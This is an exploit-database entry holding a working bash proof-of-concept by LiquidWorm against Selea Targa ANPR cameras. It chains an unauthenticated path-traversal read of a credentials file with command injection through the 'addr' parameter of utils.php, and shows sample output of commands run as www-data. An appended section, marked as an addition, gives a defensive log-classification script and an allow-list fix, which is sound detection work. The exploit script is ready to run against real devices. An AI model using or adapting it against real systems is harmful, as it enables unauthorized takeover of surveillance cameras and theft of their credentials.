# Exploit Title: Selea Targa IP OCR-ANPR Camera - 'addr' Remote Code Execution (Unauthenticated)
# Date: 07.11.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.selea.com

#!/bin/bash
#
# Selea Targa IP OCR-ANPR Camera Unauthenticated Remote Code Execution
#
#
# Vendor: Selea s.r.l.
# Product web page: https://www.selea.com
# Affected version: Model: iZero
#                          Targa 512
#                          Targa 504
#                          Targa Semplice
#                          Targa 704 TKM
#                          Targa 805
#                          Targa 710 INOX
#                          Targa 750
#                          Targa 704 ILB
#                   Firmware: BLD201113005214
#                             BLD201106163745
#                             BLD200304170901
#                             BLD200304170514
#                             BLD200303143345
#                             BLD191118145435
#                             BLD191021180140
#                             BLD191021180140
#                   CPS: 4.013(201105)
#                        3.100(200225)
#                        3.005(191206)
#                        3.005(191112)
#
# Summary: IP camera with optical character recognition (OCR) software for automatic
# number plate recognition (ANPR) also equipped with ADR system that enables it to read
# the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number
# of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number
# plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes
# this camera suitable for all installation conditions. Its built-in OCR software works
# as an automatic and independent system without the need of a computer, thus giving
# autonomy to the device even in the event of an interruption in the connection between
# the camera and the operations centre.
#
# Desc: Selea suffers from an authenticated command injection vulnerability. This can be
# exploited to inject and execute arbitrary shell commands as the www-data user through
# the 'addr' and 'port' HTTP GET parameters in utils.php page. Chaining the unauthenticated
# LFI issue an attacker can grab credentials, authenticate and execute system commands.
#
# =====================================================================================
# /mnt/app/scripts/address_check.sh:
# ----------------------------------
#
# #!/bin/sh
# . /mnt/app/scripts/env.sh
# . /mnt/app/scripts/log.sh
#
# CMD="$1"
# ADDR="$2"
# PORT="$3"
#
# if [ "$CMD" == "ping" ]; then
#     RESULT=$(/bin/ping -I eth0 -W 1 -q -c 1 "$ADDR" 2>&1 )
# elif [ "$CMD" == "port" ]; then
#     log "/usr/bin/nc -w 1 -v -z $ADDR $PORT"
#     RESULT=$(/usr/bin/nc -w 1 -v -z "$ADDR" "$PORT" 2>&1 )
# fi
#
# echo -e "$RESULT"
#
# =====================================================================================
#
# Tested on: GNU/Linux 3.10.53 (armv7l)
#            PHP/5.6.22
#            selea_httpd
#            HttpServer/0.1
#            SeleaCPSHttpServer/1.1
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2021-5620
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5620.php
#
#
# 07.11.2020
#
#
# PoC chained exploit (as admin):
#
# solidsnake@metalgear:~/prive$ ./selea.sh 192.168.1.17 id
# Password found: testingus
# Using Authorization: YWRtaW46dGVzdGluZ3VzCg==
# Using command: id
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
#
#
IP=$1
CMD=$2
PWD=`curl -s http://${IP}/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fmnt/data/auth/users.json |grep -oP 'root_pwd": "\K.*?(?=",)'`
echo 'Password found: '${PWD}
AUTH=$(echo admin:${PWD}| base64)
echo 'Using Authorization: '${AUTH}
echo 'Using command: '${CMD}
curl -s "http://${IP}/cgi-bin/utils.php?cmd=addr_check&addr=1.3.3.7\$(${CMD})&type=port&port=80" -H "Authorization: Basic ${AUTH}"|grep -oP '1.3.3.7\K.*?(?=")'
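
Detection note (added example, not part of the advisory or the vendor's code): both requests sent by the PoC above leave recognisable traces in web-server logs, and the POSIX shell sketch below classifies log lines for them, using an allow-list for the 'addr' and 'port' values rather than a list of bad characters. The log layout (Common Log Format), the sample entries and the function names `param` and `classify` are assumptions made for illustration.

```shell
#!/bin/sh
# Added example, not from the advisory: classify web-server log lines against
# the two request shapes described above. The log layout is an assumption.

# Print the value of query parameter $2 found in log line $1 (first match).
param() {
    printf '%s\n' "$1" | tr '?& "' '\n\n\n\n' | sed -n "s/^$2=//p" | head -n 1
}

# Print one verdict for a log line: lfi-traversal, addr-check-injection or ok.
classify() {
    line=$(printf '%s' "$1" | tr 'A-Z' 'a-z')   # match %2F and %2f alike

    # 1) Directory traversal under /CFCARD/images/, raw or percent-encoded.
    case $line in
        */cfcard/images/*)
            if printf '%s' "$line" |
                grep -Eq '(\.\.|%2e%2e)(/|%2f)|(/|%2f)(\.\.|%2e%2e)'; then
                echo lfi-traversal; return 0
            fi ;;
    esac

    # 2) addr_check call whose addr/port contain anything outside the allow-list.
    #    '%' is not allowed either, so percent-encoded metacharacters are caught.
    case $line in
        *utils.php*)
            if [ "$(param "$line" cmd)" = addr_check ]; then
                addr=$(param "$line" addr)
                port=$(param "$line" port)
                case $addr in *[!a-z0-9.:-]*) echo addr-check-injection; return 0 ;; esac
                case $port in *[!0-9]*) echo addr-check-injection; return 0 ;; esac
            fi ;;
    esac
    echo ok
}

# Constructed sample entries (documentation IP ranges, invented sizes).
while IFS= read -r entry; do
    printf '%-22s %s\n' "$(classify "$entry")" "$entry"
done <<'EOF'
192.0.2.10 - - [07/Nov/2020:10:00:01 +0000] "GET /CFCARD/images/SeleaCamera/%2f..%2f..%2fmnt/data/auth/users.json HTTP/1.1" 200 512
192.0.2.10 - admin [07/Nov/2020:10:00:02 +0000] "GET /cgi-bin/utils.php?cmd=addr_check&addr=1.3.3.7$(id)&type=port&port=80 HTTP/1.1" 200 96
203.0.113.5 - admin [07/Nov/2020:10:05:00 +0000] "GET /cgi-bin/utils.php?cmd=addr_check&addr=192.0.2.1&type=port&port=80 HTTP/1.1" 200 64
EOF
```

The same allow-list (hostname or IP characters for 'addr', digits only for 'port') is what a server-side fix would enforce before either value reaches a shell command line.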